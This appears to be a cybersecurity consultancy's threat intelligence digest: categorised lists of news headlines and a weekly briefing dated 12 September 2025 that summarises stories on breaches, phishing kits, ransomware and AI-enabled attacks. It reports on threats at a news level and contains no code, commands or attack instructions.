AI-Powered Sign-up Fraud Is Scaling Fast

Cybersecurity in Ukraine: new fraud schemes and how to protect yourself | УНН

Google confirms fraudulent account created in law enforcement portal

Artificial Intelligence

Scary results as study shows AI chatbots excel at phishing tactics - Cryptopolitan

Shadow AI is breaking corporate security from within - Help Net Security

AI Threats Top Focus at London Financial Services Summit

AI made crypto scams far more dangerous - Help Net Security

AI-Powered Sign-up Fraud Is Scaling Fast

Open-Source Ransomware Tools on GitHub Fuel AI-Driven Cybercrime Surge

5 trends reshaping IT security strategies today | CSO Online

Hacker Exploits Claude AI to Automate Cyberattacks on 17 Companies

Rising DNS Cyber Attacks: AI-Driven Threats Demand Zero-Trust Defenses

Most enterprise AI use is invisible to security teams - Help Net Security

AI-Powered Villager Pen Testing Tool Hits 11,000 PyPI Downloads Amid Abuse Concerns

Democratizing AI: Balancing Innovation, Risks in ChatGPT Era

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

A Quarter of UK and US Firms Suffer Data Poisoning Attacks - Infosecurity Magazine

This North Korean Phishing Attack Used ChatGPT's Image Generation

AI-Forged Military IDs Used in North Korean Phishing Attack - Infosecurity Magazine

New attack on ChatGPT research agent pilfers secrets from Gmail inboxes - Ars Technica

LinkedIn now uses your data for AI by default, opt out now! - Help Net Security

How CISOs Can Drive Effective AI Governance

AI video surveillance could end privacy as we know it - Help Net Security

Cloudflare CEO’s 'Frighteningly Likely' Forecast for How AI Will Ruin the Internet

Malware

CrowdStrike Infested With "Self-Replicating Worms"

Self-Replicating Worm Hits 180+ npm Packages to Steal Credentials in Latest Supply Chain Attack

Old file types, new tricks: Attackers turn everyday files into weapons - Help Net Security

Attackers Adopting Novel LOTL Techniques to Evade Detection - Infosecurity Magazine

The unseen side of malware and how to find it - Help Net Security

HiddenGh0st, Winos and kkRAT Exploit SEO, GitHub Pages in Chinese Malware Attacks

China-linked Mustang Panda deploys advanced SnakeDisk USB worm

Linux Security Tools Bypassed by io_uring Rootkit Technique, ARMO Research Reveals - InfoQ

HybridPetya: A Petya/NotPetya copycat comes with a twist

SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers

CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader

Bitdefender discovers China-linked malware - APDR

SEO Poisoning Targets Chinese Users with Fake Software Sites - Infosecurity Magazine

Sophisticated Cyber Campaign Deploys RATs via SEO-Poisoned GitHub Sites

Threat Actor Infests Hotels With New RAT - SecurityWeek

Mobile

Beware! New Android malware steals your money then installs ransomware | PCWorld

Cybercriminals Have a Weird New Way to Target You With Scam Texts | WIRED

Google nukes 224 Android malware apps behind massive ad fraud campaign

Google has made a huge change to the monthly Android Security Bulletin - PhoneArena

Apple addresses dozens of vulnerabilities in latest software for iPhones, iPads and Macs | CyberScoop

Apple backports zero-day patches to older iPhones and iPads

Google may shift to risk-based Android security patch rollouts - what that means for you | ZDNET

1 in 3 Android Apps Leak Sensitive Data - Infosecurity Magazine

Ex-WhatsApp cybersecurity executive says Meta endangered billions of users in new suit – DataBreaches.Net

Samsung patches actively exploited zero-day reported by WhatsApp

Make Sure Your Android Phone Has This Security Feature Enabled (And Here's Why)

CERT-FR: Take Apple spyware alerts seriously | Cybernews

Denial of Service/DoS/DDoS

Cloudflare DDoSed itself with React useEffect hook blunder • The Register

Internet of Things – IoT

Dutch University Washing Machines Hacked, Disrupting Laundry for 1,200 Students

Smart Home Security Tips to Prevent Hacking

Data Breaches/Leaks

VC firm Insight Partners says thousands of staff and limited partners had personal data stolen in a ransomware attack | TechCrunch

ShinyHunters claims 1.5 billion Salesforce records stolen in Drift hacks

FBI Issues Salesforce Instance Warning Over 'ShinyHunters' Data Theft | Salesforce Ben

SonicWall Discloses Compromise of Cloud Backup Service - Infosecurity Magazine

Attack on SonicWall’s cloud portal exposes customers’ firewall configurations | CyberScoop

SonicWall warns customers to reset credentials after breach

1 in 3 Android Apps Leak Sensitive Data - Infosecurity Magazine

British rail passengers urged to stay on guard after hack signals failure

Tiffany Data Breach Impacts Thousands of Customers - SecurityWeek

Gucci, Balenciaga and Alexander McQueen targeted in cyber-attack

Hackers steal millions of Gucci, Balenciaga, and Alexander McQueen customer records

Millions of HNW clients at risk as Gucci hacked | Insurance Business America

Insider breach at FinWise Bank exposes data of 689,000 AFF customers

Cybercriminals pwn 850k+ Americans' healthcare data • The Register

New York Blood Center Alerts 194,000 People to Data Breach - Infosecurity Magazine

Vietnam data breach: whole population exposed | Cybernews

2 Eye Care Practice Hacks Affect 260,000 Patients, Staff

Bracknell and Wokingham college hit with cyber attack | Bracknell News

Organised Crime & Criminal Actors

Cyber professionals are losing sleep over late night attacks | IT Pro

Cybercriminals Evolve Tactics: New HP Report Reveals Sophisticated Threats

Open-Source Ransomware Tools on GitHub Fuel AI-Driven Cybercrime Surge

It doesn't take a genius to be a cybercriminal - and open source ransomware is making it easier than ever | TechRadar

Cyber-scam camp operators shifting to vulnerable countries • The Register

DOJ Resentences BreachForums Founder to 3 Years for Cybercrime and Possession of CSAM

NCA Singles Out “The Com” as it Chairs Five Eyes Group - Infosecurity Magazine

The Feds Destroyed an Internet Weapon, but Criminals Picked Up the Pieces - WSJ

The Boots Bandits: How 'points thieves' are stealing loyalty card rewards from British shoppers in £300million black market | Daily Mail Online

15 ransomware gangs ‘go dark’ to enjoy 'golden parachutes' • The Register

"Pompompurin" resentenced: BreachForums creator heads back behind bars

Fifteen Ransomware Gangs “Retire,” Future Unclear - Infosecurity Magazine

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

AI made crypto scams far more dangerous - Help Net Security

Suspect in Coinbase hack kept data for more than 10,000 customers on her phone, court filing alleges | Fortune Crypto

Insider Risk and Insider Threats

The secret psychological cost of cyberattacks

Insider breach at FinWise Bank exposes data of 689,000 AFF customers

Engineer Who Tried To Pass Secrets To Russia Gets 10½ Years - Law360

Man convicted for attempting to give classified information on US Air Force systems to Russia - ABC News

Supply Chain and Third Parties

CrowdStrike Infested With "Self-Replicating Worms"

Self-Replicating Worm Hits 180+ npm Packages to Steal Credentials in Latest Supply Chain Attack

New supply chain attack hits npm registry, compromising 40+ packages

Mitigating supply chain vulnerabilities | TechRadar

Cloud/SaaS

Attack on SonicWall’s cloud portal exposes customers’ firewall configurations | CyberScoop

Disrupted phishing service was after Microsoft 365 credentials | Malwarebytes

Microsoft scores win against Office 365 credential thieves | Computer Weekly

The Cloud Edge Is the New Attack Surface

The unseen risk in Microsoft 365: disaster recovery | IT Pro

Target-rich environment: Why Microsoft 365 has become the biggest risk

Outages

Starlink outage knocks tens of thousands offline worldwide • The Register

Linux and Open Source

Linux Security Tools Bypassed by io_uring Rootkit Technique, ARMO Research Reveals - InfoQ

UEFI Secure Boot for Linux Arm64 – where do we stand? • The Register

Passwords, Credential Stuffing & Brute Force Attacks

Disrupted phishing service was after Microsoft 365 credentials | Malwarebytes

Microsoft scores win against Office 365 credential thieves | Computer Weekly

SonicWall Discloses Compromise of Cloud Backup Service - Infosecurity Magazine

SonicWall warns customers to reset credentials after breach

Password1: how scammers exploit variations of your logins | Money | The Guardian

Social Media

TikTok Deal Won't End Enterprise Risks

Facebook's settlement payments are on the way - here's how much you can expect | ZDNET

LinkedIn now uses your data for AI by default, opt out now! - Help Net Security

Australia to let Big Tech choose kids social media ban tech • The Register

Regulations, Fines and Legislation

Ransomware and the UK’s proposed ban on payments: a measured legal response or risk amplifier? | TechRadar

EU’s NIS2 directive brings tougher cybersecurity rules - The Recycler

UK ministers probe 'child-protection' Online Safety tweaks • The Register

China: 1-hour deadline on serious cyber incident reporting • The Register

Creating a compliance strategy that works across borders - Help Net Security

A Deeper Dive: The SEC Cybersecurity Rule Enforcement Landscape | BakerHostetler - JDSupra

Australia to let Big Tech choose kids social media ban tech • The Register

The CMMC Rule is Here: What Contractors Need to Know | Akin Gump Strauss Hauer & Feld LLP - JDSupra

CISA misspent millions in cyber skill retention funds: audit • The Register

CISA attempts to assert control over CVE in vision outline • The Register

Without Federal Help, Cyber Defense Is Up to Us

The Next Cyber Breach Will Not Wait: Why Congress Must Reauthorize CISA 2015

CISA blasted by US watchdog for wasting funds and retaining the wrong employees | TechRadar

The Quality Era: How CISA’s Roadmap Reflects Urgency for Modern Cybersecurity  - Security Boulevard

Agencies increasingly dive into AI for cyber defense, acting federal CISO says | CyberScoop

Models, Frameworks and Standards

EU’s NIS2 directive brings tougher cybersecurity rules - The Recycler

NCSC updates Cyber Assessment Framework (2) | UKAuthority

The CMMC Rule is Here: What Contractors Need to Know | Akin Gump Strauss Hauer & Feld LLP - JDSupra

Department of Defense Finalizes Long-Awaited Cybersecurity Rule | Morrison & Foerster LLP - Government Contracts Insights - JDSupra

Careers, Working in Cyber and Information Security

Cyber Skills Shortage Forces 64% of EMEA Organisations into Risky Security Shortcuts

Organisations still struggling to close cybersecurity skills gap

Cybersecurity: The job that comes with a daily dose of ‘impending doom’

Cyber hiring trends | Professional Security Magazine

Microsoft Principal Security Engineer on How to Get Into Cybersecurity - Business Insider

Law Enforcement Action and Take Downs

DOJ Resentences BreachForums Founder to 3 Years for Cybercrime and Possession of CSAM

NCA Singles Out “The Com” as it Chairs Five Eyes Group - Infosecurity Magazine

Hackers behind Jaguar Land Rover announce their 'retirement' – should we believe them? | IT Pro

UK arrests two teens accused of heavy involvement in yearslong Scattered Spider attack spree | CyberScoop

"Pompompurin" resentenced: BreachForums creator heads back behind bars

Engineer Who Tried To Pass Secrets To Russia Gets 10½ Years - Law360

Man convicted for attempting to give classified information on US Air Force systems to Russia - ABC News

Suspect in Coinbase hack kept data for more than 10,000 customers on her phone, court filing alleges | Fortune Crypto

Man gets over 4 years in prison for selling unreleased movies

Europol adds Spanish academic suspected of aiding pro-Russian hackers to most wanted list | The Record from Recorded Future News

RaccoonO365 Phishing Network Dismantled as Microsoft, Cloudflare Take Down 338 Domains

Misinformation, Disinformation and Propaganda

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

Russian fake-news network back in action with 200+ new sites • The Register


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russia’s Hybrid Tactics Raise Alarm in EU

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

Geopolitics Reshapes Security Budgets in Financial Services

Bitdefender discovers China-linked malware - APDR

Nation State Actors

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

Geopolitics Reshapes Security Budgets in Financial Services

China

China-linked APT41 targets government, think tanks, and academics tied to US-China trade and policy

China: 1-hour deadline on serious cyber incident reporting • The Register

HiddenGh0st, Winos and kkRAT Exploit SEO, GitHub Pages in Chinese Malware Attacks

China-linked Mustang Panda deploys advanced SnakeDisk USB worm

TikTok Deal Won't End Enterprise Risks

Chinese cyber skirmishes in the Indo-Pacific show emerging patterns of conflict | The Strategist

Bitdefender discovers China-linked malware - APDR

The countdown is on - Chinese firms now have just an hour to report cybersecurity incidents | TechRadar

SEO Poisoning Targets Chinese Users with Fake Software Sites - Infosecurity Magazine

Sophisticated Cyber Campaign Deploys RATs via SEO-Poisoned GitHub Sites

Costs of Russian, Chinese cyberattacks on German firms on rise: report

Russia

Russia’s Hybrid Tactics Raise Alarm in EU

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

MI6 launches dark web portal to attract spies in Russia - BBC News

Researchers believe Gamaredon and Turla threat groups are collaborating - Help Net Security

Russian fake-news network back in action with 200+ new sites • The Register

Europol adds Spanish academic suspected of aiding pro-Russian hackers to most wanted list | The Record from Recorded Future News

Ukrainian Cyberattack Paralyzes Russia’s Sham Election in Occupied Crimea

Engineer Who Tried To Pass Secrets To Russia Gets 10½ Years - Law360

Man convicted for attempting to give classified information on US Air Force systems to Russia - ABC News

CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader

Russian regional airline disrupted by suspected cyberattack | The Record from Recorded Future News

Iran

What's Old Is New Again as Iranian Hackers Exploit Macros

North Korea

This North Korean Phishing Attack Used ChatGPT's Image Generation

AI-Forged Military IDs Used in North Korean Phishing Attack - Infosecurity Magazine

Proton Mail Suspended Journalist Accounts at Request of Cybersecurity Agency


Tools and Controls

Geopolitics Reshapes Security Budgets in Financial Services

SonicWall Discloses Compromise of Cloud Backup Service - Infosecurity Magazine

Attack on SonicWall’s cloud portal exposes customers’ firewall configurations | CyberScoop

The Cloud Edge Is the New Attack Surface

The unseen risk in Microsoft 365: disaster recovery | IT Pro

Rising DNS Cyber Attacks: AI-Driven Threats Demand Zero-Trust Defenses

AI-Powered Villager Pen Testing Tool Hits 11,000 PyPI Downloads Amid Abuse Concerns

Threat Actors Leverage Several RMM Tools in Phishing Attack to Maintain Remote Access

Ransomware attackers used incorrectly stored recovery codes to disable EDR agents - Help Net Security

Security Execs Say Internal Mayhem Makes Cyber Attacks Worse

70% of Security Leaders Say Internal Misalignment Creates More Chaos Than Threat Actors: Cytactic's 2025 State of Cybersecurity Incident Response Management (CIRM) Report

Cyber leaders must make better use of risk experts | Computer Weekly

Zero Trust Is 15 Years Old — Why Full Adoption Is Worth the Struggle - SecurityWeek

CISOs grapple with the realities of applying AI to security functions | CSO Online

Many networking devices are still vulnerable to pixie dust attack - Help Net Security

News alert: Palo Alto flags threats that evade Secure Web Gateways — echoing SquareX research - Security Boulevard

Elon Musk Urges Heightened Security After Charlie Kirk Assassination

SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers

Phishing campaign targets Rust developers - Help Net Security

3 reasons VPN use is set to explode worldwide - and that might apply to you | ZDNET

More tools lead to greater risk of security issues and burnout - BetaNews

How Top CISOs Approach Exposure Management in the Context of Managing Cyber Risk - Security Boulevard

Digital twins give cyber defenders a predictive edge - SiliconANGLE

UEFI Secure Boot for Linux Arm64 – where do we stand? • The Register

How CISOs Can Drive Effective AI Governance

What is Mobile Threat Defense (MTD)? | Definition from TechTarget

A third of UK firms using ‘bossware’ to monitor workers’ activity, survey reveals | Privacy | The Guardian



Vulnerability Management

Google has made a huge change to the monthly Android Security Bulletin - PhoneArena

Microsoft reminds of Windows 10 support ending in 30 days

Payment System Vendor Took Year+ to Patch Infinite Card Top-Up Hack: Security Firm - SecurityWeek

Microsoft: Exchange 2016 and 2019 reach end of support in 30 days

Microsoft Warns 200 Million Windows Users—Do Not Update Your PC

Consumer Reports calls Microsoft 'hypocritical' for stranding millions of Windows 10 PCs | ZDNET

CISA attempts to assert control over CVE in vision outline • The Register

Exploring Open Source and Compliance in Vulnerability Management - Security Boulevard

Vulnerabilities

Google patches another worrying Chrome security flaw - so update now, or be at risk | TechRadar

Ransomware attackers used incorrectly stored recovery codes to disable EDR agents - Help Net Security

Many networking devices are still vulnerable to pixie dust attack - Help Net Security

Apple addresses dozens of vulnerabilities in latest software for iPhones, iPads and Macs | CyberScoop

Apple backports zero-day patches to older iPhones and iPads

Ransomware crims broke in, found recovery codes in plaintext • The Register

Cisco fixes high-severity IOS XR flaws enabling image bypass and DoS

Phoenix RowHammer Attack Bypasses Advanced DDR5 Memory Protections in 109 Seconds

Google Patches Chrome Zero-Day CVE-2025-10585 as Active V8 Exploit Threatens Millions

Update your Samsung phone ASAP to patch this zero-day flaw exploited in the wild | ZDNET

CISA Warns of Two Malware Strains Exploiting Ivanti EPMM CVE-2025-4427 and CVE-2025-4428

Samsung patches actively exploited zero-day reported by WhatsApp

CISA warns of actively exploited Dassault RCE vulnerability

Microsoft says Windows September updates break SMBv1 shares


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 12 September 2025

Black Arrow Cyber Threat Intelligence Briefing 12 September 2025:

-Qantas Penalises Executives for July Cyber Attack

-Three Critical Facts About Cyber Risk Management

-Pressure on CISOs to Stay Silent About Security Incidents Growing

-Why Security Teams Are Turning to the Dark Web to Protect Executives

-You Should Be Aware of These Latest Social Engineering Trends

-Insider Breaches Are a Bigger Security Threat than Ever Before. Here’s How Your Business Can Stay Safe

-Are Cybercriminals Hacking Your Systems or Just Logging in?

-New Automated Extortion Software Is So Devious You Won't Believe It

-Phishing Kit Unveils New Level of Sophistication

-New Malware Campaigns Highlight Rising AI and Phishing Risks

-Ransomware Kits Built with AI Are Behind a 70% Surge in Attacks

-Ransomware Losses Climb as AI Pushes Phishing to New Heights

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week’s review highlights the growing personal and organisational consequences of cyber attacks. Qantas cut executive bonuses after a major breach, reflecting increased leadership accountability. CISOs report pressure to conceal incidents, despite legal obligations. Boards are urged to adopt risk-based approaches that prioritise critical exposures.

Threats increasingly target individuals, with executives impersonated using AI and insider breaches causing costly damage. Phishing and ransomware attacks are becoming more sophisticated, using AI, mimicking multi-factor authentication and automating extortion.

These developments reinforce the need for stronger governance, clear accountability and a culture of security awareness. Contact us for guidance on how to achieve this in your organisation.

Top Cyber Stories of the Last Week

Qantas Penalises Executives for July Cyber Attack

Qantas has penalised its executive team by reducing annual bonuses by 15% after a July cyber attack exposed data belonging to 5.7 million people. The airline, which reported a profit of $1.5 billion, confirmed the breach did not involve credit card or passport data but did affect customer details such as names, emails and frequent flyer numbers, with some records also including addresses or dates of birth. The company has updated its risk management framework in response, stressing lessons learned and shared accountability among senior leaders. A forensic investigation into the incident remains ongoing.

https://therecord.media/qantas-airline-reduces-bonuses-executives-data-breach

Three Critical Facts About Cyber Risk Management

Organisations are being urged to shift from reactive cyber security to proactive risk management, as breaches continue to rise and cause severe business impact. A recent study highlighted three critical practices. First, firms must view their digital footprint the way attackers do, since exposure goes beyond what is listed in internal systems. Second, with limited resources, not every vulnerability can be fixed, so leaders must focus on the risks that matter most by weighing likelihood against impact. Finally, adopting proactive measures, supported by automation and AI, allows organisations to anticipate threats and reduce response times significantly.

https://www.trendmicro.com/en_us/research/25/i/cyber-risk-management-facts.html

Pressure on CISOs to Stay Silent About Security Incidents Growing

A recent survey has revealed that 69% of Chief Information Security Officers (CISOs) have been pressured by their employers to keep security incidents quiet, compared with 42% two years ago. This rise reflects growing tensions between regulatory obligations and corporate concerns about reputation. Experts note that attackers now often steal data quietly rather than disrupt operations, making breaches less visible but still serious. Regulators, including those enforcing GDPR and DORA, require timely disclosure, yet many CISOs report pressure to downplay or conceal incidents. Failure to disclose risks heavy penalties, loss of trust, and personal liability for senior leaders.

https://www.csoonline.com/article/4050232/pressure-on-cisos-to-stay-silent-about-security-incidents-growing.html

Why Security Teams Are Turning to the Dark Web to Protect Executives

A recent study found that nearly three quarters of US executives have been directly targeted by cyber criminals, with attacks against leaders continuing to rise. The dark web has become a marketplace where stolen credentials and personal details of corporate leaders are traded, enabling criminals to infiltrate company networks, commit fraud, or even endanger executives’ physical safety. Experts warn that once this information is leaked it cannot be removed, making prevention and monitoring critical. Organisations are being urged to strengthen access controls, improve executive cyber awareness, and integrate physical and cyber security measures into their protection plans.

https://www.digitaljournal.com/business/why-security-teams-are-turning-to-the-dark-web-to-protect-executives/article

You Should Be Aware of These Latest Social Engineering Trends

Social engineering attacks are becoming increasingly sophisticated as criminals exploit human behaviour rather than technical flaws. A recent case saw an asset management firm lose one million euros after an executive was deceived by AI-cloned voices and a fake contract. Tactics now include overwhelming victims with thousands of emails, impersonating IT helpdesks, and using legitimate tools like Microsoft Teams and Quick Assist to gain access. These methods highlight that people remain the weakest link in security. Firms are advised to strengthen access controls, limit external communications, and invest in employee awareness to reduce exposure.

https://www.csoonline.com/article/4051570/you-should-be-aware-of-these-latest-social-engineering-trends.html

Insider Breaches Are a Bigger Security Threat than Ever Before. Here’s How Your Business Can Stay Safe

New research shows insider threats, whether from careless mistakes or disgruntled employees, are now seen as a risk comparable to external cyber attacks. Nearly two thirds of organisations reported data breaches linked to insiders in the past two years, with average costs of $2.7 million. Almost half ranked data leakage from insiders as their top concern, yet only 27% use tools such as Data Loss Prevention to help manage this risk. Experts stress that while such tools are useful, businesses need layered defences and stronger oversight of how sensitive files are accessed, shared, and stored.

https://www.techradar.com/pro/security/insider-breaches-are-a-bigger-security-threat-than-ever-before-heres-how-your-business-can-stay-safe

Are Cybercriminals Hacking Your Systems or Just Logging in?

Verizon reports that stolen passwords and login details were used in nearly a third of all data breaches last year, with more than 3.2 billion credentials stolen globally, a 33% rise on the previous year. Criminals are bypassing security controls by logging in as legitimate users, often using stolen passwords, session tokens or multi-factor authentication codes. This approach has already fuelled major cyber attacks such as those against Change Healthcare and Snowflake. Organisations are urged to strengthen password protection, adopt zero trust principles, train staff against scams, and monitor for suspicious activity.

https://www.welivesecurity.com/en/business-security/cybercriminals-hacking-systems-logging-in/

New Automated Extortion Software Is So Devious You Won't Believe It

Researchers have warned of a new form of malware, known as Stealerium, that takes sextortion scams to a new level. The tool can capture login details, financial data and private messages, but more alarmingly it can detect when users access adult material, take a screenshot and activate the webcam to photograph them. Criminals are distributing it through fake emails posing as charities or banks, and it has already been seen in tens of thousands of cases. Victims are often in sectors such as hospitality, education and finance, making individuals rather than companies the main targets.

https://futurism.com/automated-extortion-software-devious

Phishing Kit Unveils New Level of Sophistication

Researchers have uncovered a new phishing campaign using the Salty2FA kit, which highlights how cyber crime operations are becoming increasingly professional. The campaign uses trusted platforms, company-branded login pages and advanced tools to bypass security controls, making attacks harder to spot and investigate. Targeted sectors include healthcare, finance, energy and technology. Crucially, the attackers even mimic multi-factor authentication, reducing the effectiveness of traditional safeguards. This shows that phishing has evolved beyond basic scams, requiring organisations to update defences and strengthen staff awareness to guard against increasingly convincing cyber attacks.

https://www.infosecurity-magazine.com/news/salty2fa-phishing-kit/

New Malware Campaigns Highlight Rising AI and Phishing Risks

Researchers have uncovered new phishing campaigns that show how attackers are combining advanced malware with social engineering to bypass security. One campaign uses fake business emails to deliver MostereRAT, a tool that can take full control of a victim’s computer, disable built-in protections, and install remote access software. Another campaign uses fake download sites and “fix” prompts to trick users into installing data stealing software. In parallel, attackers are experimenting with ways to manipulate AI-powered tools, using hidden instructions to insert malicious steps into automated summaries, highlighting the growing overlap between AI risks and cyber crime.

https://thehackernews.com/2025/09/from-mostererat-to-clickfix-new-malware.html

Ransomware Kits Built with AI Are Behind a 70% Surge in Attacks

A new report warns that ransomware attacks rose by 70% in the first half of 2025, fuelled by criminals using artificial intelligence to scale operations. Attackers are packaging phishing emails, extortion notes and other pressure tactics into ready-made kits that can be sold and reused, making attacks easier to launch. While cryptocurrency remains the preferred payment method, total ransom payments fell by 35% in 2024 due to stronger law enforcement action and sanctions. The findings highlight how AI is shifting ransomware from purely technical exploits to broader campaigns targeting human behaviour.

https://crypto.news/ransomware-kits-built-with-ai-are-behind-a-70-surge-in-attacks/

Ransomware Losses Climb as AI Pushes Phishing to New Heights

Resilience’s 2025 midyear report highlights a sharp rise in ransomware and phishing attacks, both increasingly driven by artificial intelligence. Vendor-related risks have declined from 22% to 15% of losses, but remain costly when they occur. Ransomware insurance claims rose by 17% year on year, with criminals moving to triple extortion, adding threats of data leaks and service disruption to increase pressure. Phishing has become the most common entry point, now responsible for 42% of claims and nearly 9 in 10 of total losses. AI has made these attacks more convincing, with synthetic voice and other tools boosting success rates.

https://www.securityweek.com/ransomware-losses-climb-as-ai-pushes-phishing-to-new-heights/



Threats

Ransomware, Extortion and Destructive Attacks

Remote Access Abuse Biggest Pre-Ransomware Indicator - Infosecurity Magazine

Report: Ransomware Attacks Costlier as Threat Actors Become More Systemic

Ransomware kits built with AI are behind a 70% surge in attacks

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

New Automated Extortion Software Is So Devious You Won't Believe It

Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed | Trend Micro (US)

Akira ransomware crims abusing trifecta of SonicWall flaws • The Register

The crazy, true story behind the first AI-powered ransomware • The Register

New fugitive uploaded to EU Most Wanted list for major ransomware attacks - A reward of up to USD 10 million is being offered for any information leading to his arrest | Europol

Ransomware attacks fewer but costlier - report | Insurance Business America

Most pandemic-era ransomware raids conducted by two gangs - iTnews

Ransomware Victims

Jaguar Land Rover 'working around the clock' to restore IT systems following Sunday's cyber attack | This is Money

Disruption to Jaguar Land Rover after cyber-attack may last until October | Jaguar Land Rover | The Guardian

Cyberattack on Jaguar Land Rover threatens to hit British economic growth | The Record from Recorded Future News

Jaguar Land Rover in 'truly horrible position' following cyber attack - CoventryLive

Concerns over impact of JLR cyber attack - BBC News

LunaLock Ransomware threatens victims by feeding stolen data to AI models

DZ Bank’s subsidiary says hackers lied about stolen data | Cybernews

Jaguar Land Rover Admits Data Breach Caused by Recent Cyberattack - SecurityWeek

Tata Motors shares in focus after JLR faces cybersecurity breach - The Economic Times

JLR Got Hacked So Bad They’re Still Registering Cars With Pen And Paper | Carscoops

Nevada's sex offender, restraining order databases hit in cyberattack, hobbling law enforcement - The Nevada Independent

Car part supplier's fears over Jaguar Land Rover cyber-attack - BBC News

Legal Aid Agency to begin restoring digital services in coming days, minister says – PublicTechnology

M&S tech chief leaves months after cyber attack cost it £300m | Money News | Sky News

Ransomware attack at blood center: Org tells users their data's been stolen | Malwarebytes

Lovesac warns customers their data was breached after suspected RansomHub attack six months ago

100,000 Impacted by Cornwell Quality Tools Data Breach - SecurityWeek

Panama Ministry of Economy discloses breach claimed by INC ransomware

Phishing & Email Based Attacks

Salty2FA Phishing Kit Unveils New Level of Sophistication - Infosecurity Magazine

Emerging Phishing Threats: MostereRAT, ClickFix, and State-Sponsored Risks

From MostereRAT to ClickFix: New Malware Campaigns Highlight Rising AI and Phishing Risks

Critical 0-Click Vulnerability Enables Attackers to Takeover Email Access Using Punycode

You Didn't Get Phished — You Onboarded the Attacker

iCloud Calendar abused to send phishing emails from Apple’s servers

AI-Powered Phishing Attack Targets Microsoft 365 Accounts, Experts Warn | Ubergizmo

Noisy Bear Targets Kazakhstan Energy Sector With BarrelFire Phishing Campaign

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Jeremy Clarkson reveals hackers stole £27,000 from his Cotswolds pub | The Standard

Other Social Engineering

You Didn't Get Phished — You Onboarded the Attacker

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

New Automated Extortion Software Is So Devious You Won't Believe It

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

You should be aware of these latest social engineering trends | CSO Online

Salesloft Drift Cyberattack Ups Social Engineering Attack Concerns

What is SIM-swapping fraud and what are the signs? - BBC News

Fake employers from North Korea hack hundreds | Cybernews

Beware the QR code: How a new scam is costing consumers £10,000 per day | The Independent

Fraud, Scams and Financial Crime

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

Fake employers from North Korea hack hundreds | Cybernews

US sanctions companies and individuals behind Southeast Asian scam centers | Crime News | Al Jazeera

Working with partners to tackle cyber crime and fraud - GOV.UK

Artificial Intelligence

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

Ransomware kits built with AI are behind a 70% surge in attacks

LunaLock Ransomware threatens victims by feeding stolen data to AI models

Employees keep feeding AI tools secrets they can't take back - Help Net Security

How AI Puts Company Data at Risk | Kiplinger

AI agents are here, now comes the hard part for CISOs - Help Net Security

CISOs brace for a new kind of AI chaos - Help Net Security

AI-Powered Phishing Attack Targets Microsoft 365 Accounts, Experts Warn | Ubergizmo

AI-powered malware hit 2,180 GitHub accounts in “s1ngularity” attack

Securing AI Models Against Adversarial Attacks in Financial Applications - Security Boulevard

Stealthy attack serves poisoned web pages only to AI agents - Help Net Security

Threat Actor Accidentally Exposes AI-Powered Operations - Infosecurity Magazine

Identity management was hard, AI made it harder - Help Net Security

Deepfakes are rewriting the rules of geopolitics - Help Net Security

AI is everywhere, but scaling it is another story - Help Net Security

The crazy, true story behind the first AI-powered ransomware • The Register

Anthropic Bans Chinese Entities from Claude AI Over Security Risks

2FA/MFA

Salty2FA Phishing Kit Unveils New Level of Sophistication - Infosecurity Magazine

6 ways to identify fake 2FA prompts and protect your accounts

Azure mandatory multifactor authentication: Phase 2 starting in October 2025 | Microsoft Azure Blog

Malware

macOS Stealer Campaign Uses “Cracked” App Lures to Bypass Apple Security - Infosecurity Magazine

Secretive MaaS Group Spreads Novel 'CastleRAT'

Malicious npm Packages Steal Ethereum Keys in Typosquatting Attack

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Atomic Stealer Disguised as Cracked Software Attacking macOS Users

'MostereRAT' Blends In, Blocks Security Tools

AsyncRAT Exploits ConnectWise ScreenConnect to Steal Credentials and Crypto

Hackers left empty-handed after massive NPM supply-chain attack

Vidar Infostealer Back With a Vengeance

Fileless Malware Deploys Advanced RAT via Legitimate Tools - Infosecurity Magazine

